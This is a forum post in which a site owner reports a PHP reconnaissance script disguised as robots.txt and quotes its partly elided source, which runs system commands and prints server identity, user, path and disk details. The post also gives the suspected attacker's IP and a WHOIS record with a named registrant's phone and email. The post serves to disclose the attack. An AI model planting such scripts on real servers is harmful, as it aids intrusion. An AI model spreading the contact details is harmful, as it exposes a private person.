I just caught one real life example today - a utter stupid person may just learn something from here and tried to get his hand dirty (except that he did not get what he wanted):
the robot.txt is in fact a php file trying to steal some server info:
PHP Code:
<?php
function ConvertBytes($number)
{
$len = strlen($number);
if($len < 4)
{
return sprintf("%d b", $number);
}
if($len >= 4 && $len <=6)
{
return sprintf("%0.2f Kb", $number/1024);
}
if($len >= 7 && $len <=9)
{
return sprintf("%0.2f Mb", $number/1024/1024);
}
return sprintf("%0.2f Gb", $number/1024/1024/1024);
}
echo "^bryan_ae1^<br>";
$un = @php_uname();
$up = system(uptime);
...
echo "bryan_ae1 was here ..<br>";
echo "uname -a: $un<br>";
echo "os: $os<br>";
echo "uptime: $up<br>";
echo "id: $id1<br>";
echo "pwd: $pwd1<br>";
echo "php: $php1<br>";
echo "software: $sof1<br>";
echo "server-name: $name1<br>";
echo "server-ip: $ip1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all<br>";
exit;
?>
that person was using a London based IP:62.128.131.80
who obviously had access to the site freelance.eu, the details of which is:
Quote:
Domain Name freelance
Status REGISTERED (What this means)
Registered July 17, 2006
Last update July 17, 2006, 10:19 am
Registrant
Name P.J.H. van Lier
Organisation NL Hosting Internet BV
Language Dutch
Address
Phone +31.645422166
Email admin@nlhosting.com
Registrant technical contacts
Name P.J.H. van Lier
Organisation NL Broadband Internet B.V.
Language Dutch
Address
Phone
Fax
Email
Registrar technical contacts
Name P.J.H. van Lier
Organisation NL Broadband Internet B.V.
Language Dutch
Address
Phone
Fax
Email
Registrar
Organisation NL Broadband Internet B.V.
Website Broadband.nl - .....
Nameservers
ns.nlhosting.net
ns1.nlhosting.net
|
maybe UH could make a complaint to that hosting company?